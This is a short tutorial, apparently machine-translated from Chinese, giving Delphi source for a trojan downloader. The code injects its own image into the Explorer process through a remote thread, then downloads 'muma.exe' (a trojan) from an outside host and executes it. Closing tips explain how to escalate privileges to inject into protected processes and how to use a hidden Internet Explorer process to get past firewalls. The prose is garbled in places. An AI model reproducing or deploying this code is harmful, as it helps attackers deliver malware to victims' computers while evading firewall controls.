Build a non-DLL version of penetration Firewall downloader

The idea of this code comes from the Aphex of foreign ees organizations. Basically all non-DLL download are used in this way. In fact, the use of rotten remote injection method. But the injected object is not a DLL, but a process of itself. Below is the code, because my professional knowledge is not enough, there may be some statements are not too professional. Please make a look at it. If you don't understand, please keep abreast.

Program Injecttheself;

{$IMAGEBASE $13140000}

Uses Windows, Urlmon;

Procedure Download; Download process
Begin
Urldownloadtofile (Nil, ' http://www.mycode.ful.cn/muma.exe ', ' C:\muma.exe ', 0, nil);
WinExec (' C:\muma.exe ', sw_show); Sw_show or Sw_hide
End

Var
Hmodule, Hmodule_news:pointer;
Extent, Size, Threadid:longword;
ProcessHandle, Pid:longword;

Begin
GetWindowThreadProcessId (FindWindow (' Shell_traywnd ', nil), @Pid);
Get the EXP process PID code, Shell_traywnd for the class name, related to need Spy + + to view

ProcessHandle: = OpenProcess (Process_all_access, False, Pid); Open process

Hmodule: = Pointer (GetModuleHandle (nil));
The value obtained here is a pointer-type variable that points to the content including the base address and length of its own image

Extent: = Pimageoptionalheader (Pointer (Integer (hmodule) + Pimagedosheader (hmodule). _lfanew + sizeof (DWORD) + sizeof ( Timagefileheader)). Sizeofimage;
Get the length of the memory image

VirtualFreeEx (ProcessHandle, hmodule, 0, mem_release);
Allocate a sufficient length of memory within the memory range of the EXP process

Hmodule_news: = VirtualAllocEx (ProcessHandle, hmodule, Extent, Mem_commit or Mem_reserve, page_execute_readwrite);
Determining the location of the starting base and memory image base addresses

WriteProcessMemory (ProcessHandle, Hmodule_news, hmodule, Extent, Size);
Once you have identified the above data, start the operation here

CreateRemoteThread (ProcessHandle, nil, 0, @Download, hmodule, 0, ThreadId);
Set up a remote thread so that the injection process is complete

CloseHandle (ProcessHandle);
Close the image
End.

It is necessary to note that although this is already a full-wall version of the downloader code. But it still has a lot of bugs. If you want to write your own downloader, please address the following questions :

1, the above code to use the remote injection method used by the function under Windows9x not.
2. Windows and some applications protect certain processes and do not allow the process to operate over-privileged. such as Svchost, QQ and other processes of injection, must first carry out the right to operate.
3, if you need to inject into ie. Please first use WinExec's sw_hide mode to open a hidden IE process, suspend the program for 3 seconds before injecting. This is for some old machines.

Build a non-DLL version of penetration Firewall downloader